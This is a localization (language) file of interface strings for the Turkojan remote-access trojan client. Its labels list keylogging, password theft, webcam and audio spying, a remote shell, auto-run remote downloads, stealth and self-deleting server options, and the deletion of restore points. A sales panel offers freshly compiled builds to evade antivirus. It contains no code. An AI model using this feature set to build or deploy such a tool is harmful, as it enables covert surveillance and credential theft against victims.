[General]
Program=Turkojan Language File
Author=Kýrmýzý
[frmMain]
fltttlFlatTitlebar1=Turkojan Client v4.0
tlabelLabel7=[Online : 0 ]
tflbtnbtnClose=X
fbthntbtnClose=Close
tflbtnbtnMinimize=_
fbthntbtnMinimize=Minimize
tlviewSinSrvs0=Connection ID :
tlviewSinSrvs1=IP Address :
tlviewSinSrvs2=Computer Name :
tlviewSinSrvs3=OS :
tlabelLabel3=Ready
tlabelLabel5=Status :
tlabelLabel6=Passive
tlabelLabel1=Port :
fltpnlFlatPanel13=|||||Start
flthntFlatPanel13=Start listenning
imghntImage3=Start listenning
fltpnlFlatPanel14=||||About
flthntFlatPanel14=About Program
imghntImage6=About Program
fltpnlFlatPanel16=||||||Editor
flthntFlatPanel16=Server Editor
imghntImage7=Server Editor
fltpnlFlatPanel17=|||Order
flthntFlatPanel17=Order
imghntImage9=Click here to order!
fltpnlFlatPanel18=||||||Settings
flthntFlatPanel18=Settings
imghntImage10=Server Editor
tmitemGster1=Show
tmitemN1=-
tmitemKapat1=Close
[frmManager]
fltttlFlatTitlebar1=File Manager
fltpnlFlatPanel4=Ready
tlviewlvdirs0=Folder Name
tlviewlvfiles0=File Name
tlviewlvfiles1=Size
tlviewlvfiles2=Attributes
tlviewListView10=Drives
fbthntbtnrefresh=Learn Drives
fbthntbtnwave=Play
fbthntbtnrefres=Refresh
fbthntbtndownload=Download
fbthntbtnrename=Rename
fbthntbtndelete=Delete File
fbthntbtnexecuteh=Run Hidden
fbthntbtnexecuten=Run Hidden
fbthntbtnupload=Upload
fbthntbtnziple=Zip File
fbthntFlatButton1=Zip Folder
fbthntFlatButton2=Save As Background
fbthntFlatButton3=Run Normally
fbthntFlatButton4=Show Desktop
fbthntFlatButton5=Show Documents Folder
fbthntFlatButton6=Show ProgramFiles Folder
fbthntFlatButton7=Show System Folder
fbthntFlatButton8=Show Windows Folder
fbthntFlatButton9=Show Startup Folder
fbthntFlatButton10=Create New Folder
fbthntFlatButton11=Show User Folder
fbthntFlatButton12=Read Text
tflbtnbtnClose=X
fbthntbtnClose=Close
fbthntFlatButton13=Zip Folder
fbthntbtnthumb=Show Thumbnails
[frmTaskList]
tlviewLvwProcess0=Application Name
tlviewLvwProcess1=Handle
fltpnlFlatPanel3=|||||Change|Title
flthntFlatPanel3=Change Title
fltpnlFlatPanel4=||||Refresh|List
flthntFlatPanel4=Refresh List
fltchkFlatCheckBox1=Show all applications
fltpnlFlatPanel5=|||||Close|Program
flthntFlatPanel5=Close Selected Program
fltpnlFlatPanel6=|||||Show|Application
flthntFlatPanel6=Show Application
fltpnlFlatPanel7=||||Hide|Application
flthntFlatPanel7=Hide Application
fltpnlFlatPanel8=||||Flash|Program
flthntFlatPanel8=Flash Selected Program
fltpnlFlatPanel9=||||||Hide|X|Button
flthntFlatPanel9=Hide X Button
fltpnlFlatPanel10=||||Maximize|It
flthntFlatPanel10=Maximize Selected Application
fltpnlFlatPanel11=|||Minimize|It
flthntFlatPanel11=Minimize Selected Application
fltpnlFlatPanel12=||Active|It
flthntFlatPanel12=Make Selected Application Active
fltpnlFlatPanel13=||Deactive|It
flthntFlatPanel13=Make Selected Application Deactive
fltpnlFlatPanel14=Process|Settings
[frmScreen]
tlviewLvwResolutions0=Avaliable Resolutions
fltpnlFlatPanel4=||||||Get|Avaliable|Resolutions
flthntFlatPanel4=Get Avaliable Resolutions
fltpnlFlatPanel6=||||Change|Resolution
flthntFlatPanel6=Change Resolution
fltpnlFlatPanel12=Set|Screen|Resolution
[frmOpenChat]
tflboxFlatGroupBox1=Chat Properties
tlabelLabel5=User's Nickname [yours] :
tlabelLabel6=Servers' Nickname [remote] :
tflboxFlatGroupBox2=Other Properties
tlabelLabel7=Size of chat window : 
tlabelLabel8=%(Percent)
tlabelLabel9=of the screen
fltpnlFlatPanel10=||||||Start|Chatting|With|Server
flthntFlatPanel10=Start Chatting With Server
fltpnlFlatPanel4=||||||Load|Default|Settings
flthntFlatPanel4=Load Default Settings
fltpnlFlatPanel12=Chat|With|Server
[frmMsgBox]
tlabelLabel1=Message Title :
tlabelLabel2=Message :
tlabelLabel3=Use '|' charecter to send multiline message
tflboxFlatGroupBox1=Message Icon
tflbtnFlatButton1=[ANY]
tflboxFlatGroupBox2=Message Buttons
fltrbtFlatRadioButton1=OK
fltrbtFlatRadioButton2=OK,Cancel
fltrbtFlatRadioButton3=Yes,No
fltrbtFlatRadioButton4=Yes,No,Cancel
fltrbtFlatRadioButton5=Retry,Cancel
fltrbtFlatRadioButton6=Abort,Retry,Ignore
fltpnlFlatPanel10=||||Test|Message
flthntFlatPanel10=Test Message
fltpnlFlatPanel4=|||Send|Message
flthntFlatPanel4=Send Message
fltpnlFlatPanel3=!
flthntFlatPanel3=Error messages
fltpnlFlatPanel12=Send|Fake|Error|Messages
[frmLogger]
fltpnlFlatPanel5=||Active
flthntFlatPanel5=Open online keylogger
fltpnlFlatPanel6=||||Deactive
flthntFlatPanel6=Close online keylogger
fltpnlFlatPanel7=||||Clear
flthntFlatPanel7=Clear
fltpnlFlatPanel1=|||||Save
flthntFlatPanel1=Save
fltpnlFlatPanel18=Online|Keylogger
[frmInformation]
fltpnlFlatPanel5=|||||System|Information
flthntFlatPanel5=Get System Information
fltpnlFlatPanel7=||||Clear
flthntFlatPanel7=Clear
fltpnlFlatPanel3=|||||Save
flthntFlatPanel3=Save
tlviewListViewInformacion0=Description
tlviewListViewInformacion1=Information
fltpnlFlatPanel18=System|Information
[frmFun]
tflboxFlatGroupBox1=Desktop
fltpnlFlatPanel7=|||Hide
flthntFlatPanel7=Hide Desktop
fltpnlFlatPanel3=|||||Show
flthntFlatPanel3=Show Desktop
tflboxFlatGroupBox2=Desktop
fltpnlFlatPanel4=|||Locked
flthntFlatPanel4=Lock Desktop
fltpnlFlatPanel5=||||Unlocked
flthntFlatPanel5=Unlock Desktop
tflboxFlatGroupBox3=Start Button
fltpnlFlatPanel6=|||Hide
flthntFlatPanel6=Hide Start Button
fltpnlFlatPanel8=|||||Show
flthntFlatPanel8=Show start Button
tflboxFlatGroupBox4=Taskbar
fltpnlFlatPanel9=|||Hide
flthntFlatPanel9=Hide Taskbar
fltpnlFlatPanel10=|||||Show
flthntFlatPanel10=Show Taskbar
tflboxFlatGroupBox5=Task Icons
fltpnlFlatPanel11=|||Hide
flthntFlatPanel11=Hide Task Icons
fltpnlFlatPanel12=|||||Show
flthntFlatPanel12=Show Task Icons
tflboxFlatGroupBox6=system Clock
fltpnlFlatPanel13=|||||Show
flthntFlatPanel13=Show System Clock
fltpnlFlatPanel14=|||Hide
flthntFlatPanel14=Hide System Clock
tflboxFlatGroupBox7=Monitor
fltpnlFlatPanel15=|||Open
flthntFlatPanel15=Open Monitor
fltpnlFlatPanel16=||||Close
flthntFlatPanel16=Close Monitor
tflboxFlatGroupBox8=CD-Rom
fltpnlFlatPanel17=|||Open
flthntFlatPanel17=Open CD-Rom
fltpnlFlatPanel18=||||Close
flthntFlatPanel18=Close CD-Rom
tflboxFlatGroupBox9=Taskbar
fltpnlFlatPanel19=|||Locked
flthntFlatPanel19=Lock Taskbar
fltpnlFlatPanel20=||||Unlocked
flthntFlatPanel20=Unlock Taskbar
tflboxFlatGroupBox10=Start Button
fltpnlFlatPanel21=|||Locked
flthntFlatPanel21=Lock Start Button
fltpnlFlatPanel22=||||Unlocked
flthntFlatPanel22=Unlock Start Button
fltpnlFlatPanel23=Fun|Menu
[frmFind]
tflboxFlatGroupBox1=Searching Properties
tlabelLabel1=File that will be found : 
tlabelLabel2=Directory to search file :
fltpnlFlatPanel5=|||||Find|Files
flthntFlatPanel5=Find Files
fltpnlFlatPanel3=|||||Clear|List
flthntFlatPanel3=Clear List
tlviewlvdirs0=File
tlviewlvdirs1=Directory
tlviewlvdirs2=Size
fltpnlFlatPanel4=|||||Download|It
flthntFlatPanel4=Download It
fltpnlFlatPanel12=Find|Files
[frmClipboard]
tflboxFlatGroupBox1=Clipboard
fltpnlFlatPanel4=|||||Read|Clipboard
flthntFlatPanel4=Read Clipboard
fltpnlFlatPanel3=|||Set|Clipboard
flthntFlatPanel3=Set Clipboard Text
fltpnlFlatPanel5=||||Clear|Clipboard
flthntFlatPanel5=Clear Clipboard
fltpnlFlatPanel6=||Lock|Clipboard
flthntFlatPanel6=Lock Clipboard
fltpnlFlatPanel7=|||||Unlock|Clipboard
flthntFlatPanel7=Unlock Clipboard
fltpnlFlatPanel18=Clipboard Settings
[frmRemoteDownload]
fltttlFlatTitlebar1=Remote Download
tflbtnbtnClose=X
fbthntbtnClose=Close
tflboxFlatGroupBox1=File Properties 
tlabelLabel1=Address : 
tlabelLabel2=File Name :
tlabelLabel3=Folder : 
tflboxFlatGroupBox3=Download Directory 
fltrbtFlatRadioButton1=Appdata Folder
fltrbtFlatRadioButton2=Windows Folder
fltrbtFlatRadioButton6=System Folder
fltrbtFlatRadioButton3=Temp Folder
fltrbtFlatRadioButton5=Other Folder
fltrbtFlatRadioButton4=Startup Folder
fltchkFlatCheckBox1=Execute file automatically after download
fltpnlFlatPanel6=||||Test|Download
flthntFlatPanel6=Test Download
imghntImage5=Test Download
fltpnlFlatPanel3=||||Start|Downloading
flthntFlatPanel3=Start Downloading
imghntImage1=Start Downloading
[frmIMSniffOff]
fltpnlFlatPanel5=|||Get|Logs
flthntFlatPanel5=Get Logs
fltpnlFlatPanel7=|||Clear Logs
flthntFlatPanel7=Clear Logs
fltpnlFlatPanel1=||||Save
flthntFlatPanel1=Save Logs
fltpnlFlatPanel18=Offline|Msn|Logs
[frmIMSniffOn]
fltpnlFlatPanel5=||Active
flthntFlatPanel5=Open Online Keylogger
fltpnlFlatPanel6=||||Deactive
flthntFlatPanel6=Close Online Keylogger
fltpnlFlatPanel7=||||Clear
flthntFlatPanel7=Clear
fltpnlFlatPanel1=|||||Save
flthntFlatPanel1=Save
fltpnlFlatPanel18=Online|Msn|Logs
[frmBlockSite]
tlviewLvwResolutions0=Blocked Web-Sites
fltpnlFlatPanel4=|||||Get|List
flthntFlatPanel4=Learn Blocked Sites
fltpnlFlatPanel6=|||||Remove
flthntFlatPanel6=Remove Selected From List
fltpnlFlatPanel3=||||||Save
flthntFlatPanel3=Save List
fltpnlFlatPanel5=|||||Clear
flthntFlatPanel5=Clear List
fltpnlFlatPanel7=||||Add
flthntFlatPanel7=Add New Web-Site
fltpnlFlatPanel12=Block Web-Site
[frmAyarlar]
tflboxFlatGroupBox1=Connection Settings
tlabelLabel1=Music : 
fltchkFlatCheckBox1=Notify me when user is online
fltchkFlatCheckBox2=Play .wav file when user is online
fltpnlFlatPanel4=!
flthntFlatPanel4=Select .wav file
tflboxFlatGroupBox2=Connection Details
fltchkFlatCheckBox3=Keep a history of connection details
fltpnlFlatPanel3=||||||Save|Settings
flthntFlatPanel3=Save Settings
fltpnlFlatPanel6=|||||Default|Settings
flthntFlatPanel6=Default Settings
fltttlFlatTitlebar1=Settings
tflbtnbtnClose=X
fbthntbtnClose=Close
[frmTest]
fltttlFlatTitlebar1=Port Tester
tflbtnbtnClose=X
fbthntbtnClose=Close
tlabelLabel2=Port : 
fltpnlFlatPanel5=|||||Test|It
flthntFlatPanel5=Test It
fltpnlFlatPanel4=|Ready
[frmSupport]
tlabelLabel8=Contact With :
tflboxFlatGroupBox1=Mail Details
tlabelLabel5=Name :
tlabelLabel6=Address :
tlabelLabel7=Subject :
tlabelLabel1=Icq # :
tlabelLabel2=Web :
tlabelLabel3=City :
fltpnlFlatPanel5=Send|Mail
flthntFlatPanel5=Send Mail
fltpnlFlatPanel14=Contact|us|via|E-mail
[frmMessages]
fltttlFlatTitlebar1=Error Messages
tflbtnbtnClose=X
fbthntbtnClose=Close
fltpnlFlatPanel4=||||Select|Msg
flthntFlatPanel4=Select Message
fltpnlFlatPanel6=|Close
flthntFlatPanel6=Close
[frmKeyboard]
tflboxFlatGroupBox2=Ctrl+Alt+Del
fltpnlFlatPanel4=||||Locked
flthntFlatPanel4=Lock Ctrl+Alt+Del
fltpnlFlatPanel5=||||||Unlocked
flthntFlatPanel5=Unlock Ctrl+Alt+Del
tflboxFlatGroupBox1=Alt+Tab
fltpnlFlatPanel3=||||Locked
flthntFlatPanel3=Lock Alt+Tab
fltpnlFlatPanel6=||||||Unlocked
flthntFlatPanel6=Unlock Alt+Tab
tflboxFlatGroupBox3=Num-Lock
fltpnlFlatPanel7=|||Close
flthntFlatPanel7=Close Num-Lock
fltpnlFlatPanel8=|||Open
flthntFlatPanel8=Open Num-Lock
tflboxFlatGroupBox4=Caps-lock
fltpnlFlatPanel9=|||Close
flthntFlatPanel9=Close Caps-Lock
fltpnlFlatPanel10=|||Open
flthntFlatPanel10=Open Caps-Lock
tflboxFlatGroupBox5=Scroll-Lock
fltpnlFlatPanel11=|||Close
flthntFlatPanel11=Close Scroll_Lock
fltpnlFlatPanel12=|||Open
flthntFlatPanel12=Open Scroll-Lock
tflboxFlatGroupBox6=All Keys
fltpnlFlatPanel13=||||Locked
flthntFlatPanel13=Lock Keyboard
fltpnlFlatPanel14=||||||Unlocked
flthntFlatPanel14=Unlock Keyboard 
tflboxFlatGroupBox7=Turn On/Off Keyboard Lights
fltpnlFlatPanel15=||||Turn|Off|Keyboard|Lights
flthntFlatPanel15=Turn Off Keyboard Lights
fltpnlFlatPanel16=|||||Turn|On|Keyboard|Lights
flthntFlatPanel16=Turn On Keyboard Lights
fltpnlFlatPanel18=Keyboard|Manager
[frmSettings]
tflboxFlatGroupBox1=User Name
tlabelLabel2=User Name :
tflboxFlatGroupBox3=DNS / IP
tlabelLabel3=Address :
tflboxFlatGroupBox4=Server Settings
fltpnlFlatPanel5=|||||Get|Server|Settings
flthntFlatPanel5=Get Server Settings
fltpnlFlatPanel3=|||||Save|Server|Settings
flthntFlatPanel3=Save Server Settings
tflboxFlatGroupBox5=Close/Remove Server
fltpnlFlatPanel4=||||||Close|Server[Temporary]
flthntFlatPanel4=Close Server
fltpnlFlatPanel6=||||||Remove|Server[Completely]
flthntFlatPanel6=Remove Server
tflboxFlatGroupBox2=Port No 
tlabelLabel1=Connection Port :
tflboxFlatGroupBox6=Connection Delay
tlabelLabel4=Delay
tlabelLabel5=sec. for connection
fltpnlFlatPanel12=Server|Settings
[frmPasswords]
fltpnlFlatPanel5=||||||Messenger
flthntFlatPanel5=Get Instant Messenger Passwords[Icq,Msn...]
fltpnlFlatPanel6=||||E-Mail
flthntFlatPanel6=Get E-Mail Passwords
fltpnlFlatPanel7=||Dialer
flthntFlatPanel7=Get Dialer Passwords
fltpnlFlatPanel11=|||Save
flthntFlatPanel11=Save Passwords
fltpnlFlatPanel13=|||||Browser
flthntFlatPanel13=Get Browser Passwords[Explorer,Opera..]
fltpnlFlatPanel14=|||||FTP|Pwds
flthntFlatPanel14=Get FTP Passwords
fltpnlFlatPanel3=||||||Downloader
flthntFlatPanel3=Get Downloader Passwords
fltpnlFlatPanel4=||||||Other|Pwds
flthntFlatPanel4=Get Other Passwords
fltpnlFlatPanel12=Get|Saved|Passwords
[frmShutDown]
tflboxFlatGroupBox1=Computer
fltpnlFlatPanel4=||||||Shut|Down
flthntFlatPanel4=Shut Down
fltpnlFlatPanel6=||||Reboot
flthntFlatPanel6=Reboot
fltpnlFlatPanel7=|||||Log|Off
flthntFlatPanel7=Log Off
tflboxFlatGroupBox11=Flip Screen
fltpnlFlatPanel24=||||Flip|Screen|Vertical
flthntFlatPanel24=Flip Screen Vertical
fltpnlFlatPanel25=||||||Flip|Screen|Horizontal
flthntFlatPanel25=Flip Screen Horizontal
tflboxFlatGroupBox2=Send infinite messages
fltpnlFlatPanel5=||||||Send|Message
flthntFlatPanel5=Send Message
fltpnlFlatPanel12=Extra|Fun
[frmMouse]
tflboxFlatGroupBox1=Length of Click Speed
tlabelLabel1=5
tflboxFlatGroupBox2=Double Click Speed
fltpnlFlatPanel3=||||Set Speed
flthntFlatPanel3=Set Double Click Speed
fltpnlFlatPanel4=||Learn Speed
flthntFlatPanel4=Learn Double Click Speed
tflboxFlatGroupBox3=Control Mouse
fltpnlFlatPanel5=||||Start
flthntFlatPanel5=Start Controlling Mouse
fltpnlFlatPanel7=||||Stop
flthntFlatPanel7=Stop Controlling Mouse
tflboxFlatGroupBox4=Crazy Mouse
fltpnlFlatPanel8=||||Start
flthntFlatPanel8=Start
fltpnlFlatPanel9=||||Stop
flthntFlatPanel9=Stop
tflboxFlatGroupBox5=Mouse Buttons
fltpnlFlatPanel10=|||||Change
flthntFlatPanel10=Change Mouse Buttons
fltpnlFlatPanel11=||||Default
flthntFlatPanel11=Set Mouse Buttons to Default
tflboxFlatGroupBox6=Mouse Lock
fltpnlFlatPanel12=||||Lock
flthntFlatPanel12=Lock Mouse
fltpnlFlatPanel13=||||Unlocked
flthntFlatPanel13=Unlock Mouse
tflboxFlatGroupBox7=Bungi Mouse
fltpnlFlatPanel14=||||Start
flthntFlatPanel14=Start Bungi Mouse
fltpnlFlatPanel15=||||Stop
flthntFlatPanel15=Stop Bungi Mouse
tflboxFlatGroupBox8=Mouse Tail
fltpnlFlatPanel6=||||Set|Lenght|of|Mouse|Tail
flthntFlatPanel6=Set Lenght of Mouse Tail
fltpnlFlatPanel18=Mouse|Settings
[frmFun_1]
tflboxFlatGroupBox1=Desktop
fltpnlFlatPanel7=|||Hide
flthntFlatPanel7=Hide Desktop
fltpnlFlatPanel3=|||||Show
flthntFlatPanel3=Show Desktop
tflboxFlatGroupBox2=Desktop
fltpnlFlatPanel4=|||||Locked
flthntFlatPanel4=Lock Desktop
fltpnlFlatPanel5=||||||Unlocked
flthntFlatPanel5=Unlock Desktop
tflboxFlatGroupBox3=Start Button
fltpnlFlatPanel6=|||Hide
flthntFlatPanel6=Hide Start Button
fltpnlFlatPanel8=|||||Show
flthntFlatPanel8=Show Start Button
tflboxFlatGroupBox4=Taskbar
fltpnlFlatPanel9=|||Hide
flthntFlatPanel9=Hide Taskbar
fltpnlFlatPanel10=|||||Show
flthntFlatPanel10=Show Taskbar
tflboxFlatGroupBox5=Task Icons
fltpnlFlatPanel11=|||Hide
flthntFlatPanel11=Hide Task Icons
fltpnlFlatPanel12=|||||Show
flthntFlatPanel12=Show Task Icons
tflboxFlatGroupBox6=System Clock
fltpnlFlatPanel13=|||||Show
flthntFlatPanel13=Show System Clock
fltpnlFlatPanel14=|||Hide
flthntFlatPanel14=Hide System Clock
tflboxFlatGroupBox7=Monitor
fltpnlFlatPanel15=|||Open
flthntFlatPanel15=Open Monitor
fltpnlFlatPanel16=||||Close
flthntFlatPanel16=Close Monitör
tflboxFlatGroupBox8=CD-Rom
fltpnlFlatPanel17=|||Open
flthntFlatPanel17=Open CD-Rom
fltpnlFlatPanel18=||||Close
flthntFlatPanel18=Close CD-Rom
tflboxFlatGroupBox9=Taskbar
fltpnlFlatPanel19=|||||Locked
flthntFlatPanel19=Lock Taskbar
fltpnlFlatPanel20=|||||Unlocked
flthntFlatPanel20=Unlock Taskbar
tflboxFlatGroupBox10=Start Button
fltpnlFlatPanel21=||||Locked
flthntFlatPanel21=Lock Start Button
fltpnlFlatPanel22=||||||Unlocked
flthntFlatPanel22=Unlock Start Button
fltpnlFlatPanel23=Fun|Menu
[frmOffLogger]
fltpnlFlatPanel5=|||Get|Logs
flthntFlatPanel5=Get Logs
fltpnlFlatPanel7=||||Clear|Logs
flthntFlatPanel7=Clear
fltpnlFlatPanel1=|||||Save
flthntFlatPanel1=Save
fltpnlFlatPanel18=Offline|Keylogger
[frmAudio]
fltttlFlatTitlebar1=Audio Streaming
tflbtnbtnClose=X
fbthntbtnClose=Close
fltpnlFlatPanel5=||||Start
flthntFlatPanel5=Start
tflboxFlatGroupBox1=Audio Properties
tlabelLabel1=Format : 
fltpnlFlatPanel3=||||Stop
flthntFlatPanel3=Stop
[frmExplorer]
tflboxFlatGroupBox1=Open Web-Page
fltpnlFlatPanel3=||||Visit
flthntFlatPanel3=Visit This Page Remotely 
tflboxFlatGroupBox2=Change Internet Explorer Start Page
fltpnlFlatPanel4=||||Set
flthntFlatPanel4=Set Internet Explorer Start Page
tflboxFlatGroupBox3=Last visited 25 web-sites
fltpnlFlatPanel5=||||Get|List
flthntFlatPanel5=Learn last visited 25 web-sites
fltpnlFlatPanel6=|||||Defaults
flthntFlatPanel6=Load Defaults
fltpnlFlatPanel7=|||Clear
flthntFlatPanel7=Clear
fltpnlFlatPanel12=Internet|Explorer|Settings
[frmRegistryEditor]
tlabelLabel8=registry editor\manager
fltttlFlatTitlebar2=Registry Editor
tflbtnbtnClose=X
fbthntbtnClose=Close
tlviewlvkeys0=Key name
tlviewlvdataname0=Name
tlviewlvdataname1=Data
tmitemrefresh1=&Refresh
tmitemN1=-
tmitemedit1=&Edit
tmitemN2=-
tmitemdelete1=&Delete
tmitemN4=-
tmitemcreatenewstringvalue1=Create new string value
tmitemcreatenewintegervalue1=Create new integer value
tmitemN3=-
tmitemsave1=Save
tmitemCreatenewkey2=Create new value
[frmRegistryCreate]
tlabelLabel1=Value Type :
tlabelLabel2=Name :
tlabelLabel4=Data :
fltpnlFlatPanel13=|||||Okay
flthntFlatPanel13=Okay
imghntImage3=Okay
fltpnlFlatPanel3=|||||Close
flthntFlatPanel3=Close
imghntImage1=Close
fltttlFlatTitlebar2=Registry Value
tflbtnbtnClose=X
fbthntbtnClose=Close
[frmEditor]
fltttlFlatTitlebar1=Server Editor
tflbtnbtnClose=X
fbthntbtnClose=Close
tflboxFlatGroupBox2=User Name
tlabelLabel1=User Name :
tflboxFlatGroupBox3=DNS - IP (Yours) 
tlabelLabel2=Address : 
tflboxFlatGroupBox4=Port No 
tlabelLabel3=Conection Port : 
tlabelLabel10=File Name : 
fltchkFlatCheckBox3=Pack server via using UPX v.3.02 [smaller server] 
fltpnlFlatPanel8=||||||Save
flthntFlatPanel8=Save Server
imghntImage7=Save Server
tflboxFlatGroupBox5=Connection Delay
tlabelLabel4=Delay
tlabelLabel5=sec. for connection
tlabelLabel6=Registry Name : 
fltchkFlatCheckBox1=Copy server to PC
fltchkFlatCheckBox2=Autostart server
tflboxFlatGroupBox1=Icon
fltpnlFlatPanel13=|||||Default
flthntFlatPanel13=Default Icon
imghntImage1=Default Icon
fltpnlFlatPanel4=||||||Select|Icon
flthntFlatPanel4=Select Icon
imghntImage2=Select Icon
fltpnlFlatPanel9=|||||Icon|Hunter
flthntFlatPanel9=Icon Hunter
imghntImage4=Icon Hunter
tlabelLabel7=Mesaj Title : 
tlabelLabel8=Message : 
tlabelLabel9=Msg Icon : 
fltpnlFlatPanel6=|||||Test
flthntFlatPanel6=Test message
imghntImage5=Test message
fltchkFlatCheckBox4=Show Message
tflboxFlatGroupBox10=Running mode
fltrbtFlatRadioButton1=Help mode (visible)
fltrbtFlatRadioButton2=Stealth mode (invisible)
tflboxFlatGroupBox9=Other settings 
fltchkFlatCheckBox6=Melt server when run
fltchkFlatCheckBox7=Copy with old file date
fltchkFlatCheckBox8=Delete system restore points
fltchkFlatCheckBox5=Restart when server is closed
[frmBuy]
tlabelLabel1=Turkojan Public Edition
tlabelLabel2=, doesn't have any harmful code in it.But
tlabelLabel3=some anti-virus softwares describe it as "hacking tool","virus" or "re-
tlabelLabel4=mote administration tool"  and automatically remove it.
tlabelLabel5=So that we have a special service for you :
tlabelLabel6=When you buy Turkojan
tlabelLabel7=, you will have freshly compiled unique 
tlabelLabel8=version.Also you will be able to get 7/24 technical support.We only 
tlabelLabel9=accept E-Gold and Western Union payments.
tlabelLabel10=Turkojan Private Edition
tlabelLabel11=, has 3 different versions.We replace it
tlabelLabel12=if there is any problem in warranty period.This period depends which
tlabelLabel13=version you have bought.[1-3-6 months]
tlabelLabel14=If you want to order it or
tlabelLabel15=have any problems about our product,
tlabelLabel16=contact us via e-mail.You can also get detailed information about our
tlabelLabel17=prices from our web-sites.
tlabelLabel18=To learn order process please mail us :
tlabelLabel20=Detailed information :
fltpnlFlatPanel14=Order|Private|Edition
[frmServices]
tlviewLvwProcess0=Service Name :
tlviewLvwProcess1=Explanation :
tlviewLvwProcess2=State :
fltpnlFlatPanel4=|||Get|Service|List
flthntFlatPanel4=Get Service List
imghntImage3=Get Service List
fltpnlFlatPanel12=||||Start|Selected|Service
flthntFlatPanel12=Start Selected Service
imghntImage10=Start Selected Service
fltpnlFlatPanel13=||||Stop|Selected|Service
flthntFlatPanel13=Stop Selected Service
imghntImage11=Stop Selected Service
fltpnlFlatPanel5=||||Uninstall|Selected
flthntFlatPanel5=Uninstall Selected Service
imghntImage2=Remove Selected Service
fltpnlFlatPanel14=Services
[frmNotepad]
fltttlFlatTitlebar1=Text File
tflbtnbtnClose=X
fbthntbtnClose=Close
[frmRename]
fltttlFlatTitlebar1=Create New Folder
tflbtnbtnClose=X
fbthntbtnClose=Close
fltpnlFlatPanel5=||||Okay
flthntFlatPanel5=Okay
[frmNewFol]
fltttlFlatTitlebar1=Rename
tflbtnbtnClose=X
fbthntbtnClose=Close
fltpnlFlatPanel5=||||Close
flthntFlatPanel5=Close
[frmTerminate]
tlviewLvwProcess0=Application Name : 
tlviewLvwProcess1=PID :
fltpnlFlatPanel4=||||||Refresh|Application|List
flthntFlatPanel4=Refresh Application List
imghntImage3=Refresh Application List
fltpnlFlatPanel5=|||||Terminate|Application
flthntFlatPanel5=Terminate Application
imghntImage2=Terminate Application
fltpnlFlatPanel14=Running|Applications
[frmShell]
fltttlFlatTitlebar1=Remote Shell
tflbtnbtnClose=X
fbthntbtnClose=Close
[Thumb]
fltttlFlatTitlebar1=Thumbnail Viewer
tflbtnbtnClose=X
fbthntbtnClose=Close
[frmCredits]
fltpnlFlatPanel14=About Program
[frmTransfer]
tlviewListView20=Where
tlviewListView21=From
tlviewListView22=Size
tlviewListView23=State
fltpnlbutton7=||||||Stop
flthntbutton7=Stop Transfer
tmitemDurdur1=Stop
tmitemSil1=Delete
tmitemListeyiBosalt1=Clear List
[frmInsApps]
fltpnlFlatPanel5=||||Learn|Applications
flthntFlatPanel5=Learn Installed Applications
fltpnlFlatPanel7=||Clear|List
flthntFlatPanel7=Clear List
fltpnlFlatPanel3=|||||Save List
flthntFlatPanel3=Save List
fltpnlFlatPanel18=Installed|Applications
[frmStream]
fltttlFlatTitlebar1=Webcam Streaming
tlabelLabel1=0 fps
tflbtnbtnClose=X
fbthntbtnClose=Close
tlabelLabel4=65
tlabelLabel5=5
fbthntFlatButton3=Start Recording Video
fbthntFlatButton4=Start
fbthntFlatButton6=Save Picture
fbthntFlatButton8=Stop
fbthntFlatButton1=Stop Recording Video
fltpnlFlatPanel4=|||||Get|List
flthntFlatPanel4=Get List
[frmCredits]
fltpnlFlatPanel14=About Program
[CUSTOM]
lng0=passwords
lng1=server passwords
lng2=accessories
lng3=remote desktop
lng4=webcam streaming
lng5=audio streaming
lng6=settings manager
lng7=clipboard settings
lng8=explorer settings
lng9=application settings
lng10=applications
lng11=services
lng12=registry editor
lng13=mouse settings
lng14=resolution
lng15=manage keyboard
lng16=keyboard settings
lng17=online keylogger
lng18=offline keylogger
lng19=extra
lng20=online msn sniffer
lng21=offline msn sniffer
lng22=communication
lng23=chat with server
lng24=send message
lng25=manage files
lng26=file manager
lng27=find files
lng28=remote download
lng29=commands
lng30=remote shell
lng31=block sites
lng32=server properties
lng33=server settings
lng34=system information
lng35=get system info
lng36=installed application
lng37=fun manager
lng38=fun menu
lng39=extra fun
lng40=contact us
lng41=order
lng42=web-site
lng43=send mail
lng44=about
lng45=local tools
lng46=port tester
lng47=server editor
lng48=settings
lng49=Select file to download!
lng50=Please type username!
lng51=Please type DNS/Ip address!
lng52=Please type a valid port number!
lng53=Please type delay time!
lng54=Select file to download!
lng55=Select file to delete!
lng56=Are you sure that you want to delete selected file?
lng57=Select file to execute!
lng58=Select file to zip!
lng59=Please enter the folder that you want to zip!
lng60=You need to install plugin to go on this process,do you want to install plugin?
lng61=Mail sent! We will send a reply to your mail as soon as possible.Thank you!
lng62=Error occured while sending mail. Please try again later!
lng63=Please type a name!
lng64=Please type your e-mail address!
lng65=Please type a mail subject!
lng66=Please type a valid mail address!
lng67=Please don't send an empty mail!
lng68=Please select the person that you want to contact with!
lng69=Are you sure that you want to close server?
lng70=Are you sure that you want to remove server?
lng71=Are you sure that you want to delete all files in this folder?
lng72=No connection!
lng73=Please select an application!
lng74=Error
lng75=Please select a resolution!
lng76=Please type a nickname for yourself!
lng77=Please type a nickname for server side!
lng78=Please type a valid screen size!This value should be a number between 15 and 100!
lng79=Please fill all blanks!
lng80=Are you sure that you want to delete this value?
lng81=Verify deleting
lng82=Please type a valid integer value!
lng83=Please type a valid file name!
lng84=Please type a name for user!
lng85=If you want server to show message,please fill required blanks!
lng86=Please type a valid registry key name!
lng87=Please type a valid file name!
lng88=Please type a valid DNS/Ip address!
lng89=Please type delay time!
lng90=Please type a valid port number!This number should be a number between 1 and 65535 !
lng91=Please select a valid icon!
lng92=Error occured while saving some settings!
lng93=Error occured!Can't create server!
lng94=Can't change Icon!
lng95=Please select an application!
lng96=The icon of the application that you select,will be copied to the program directory!
lng97=Information
lng98=Icons of the application that you selected,were saved to the program directory!
lng99=Please select a service!
lng100=Please select an application!
lng101=Please select device that you want to capture video!
lng102=Please type the address of the file that you want server to download!
lng103=File address should start with 'http://' or 'ftp://' !
lng104=Please type remote filename!
lng105=Please select folder to download file!
lng106=Please select the web-site that you will remove!
lng107=Please select a .wav file!
lng108=Offline
lng109= nicknamed 
lng110= [ip address] user is offline.
lng111= [ip address] user is online.
lng112=No Connection!
lng113=Ready
lng114=Stop
lng115=Stop listenning
lng116=Started
lng117=Start listenning
lng118=Stopped
lng119=Start
lng120=No connection!
lng121=Plugin installed!
lng122=Thumbnails viewed!
lng123=Remote desktop connection stopped
lng124=Webcam streaming stopped
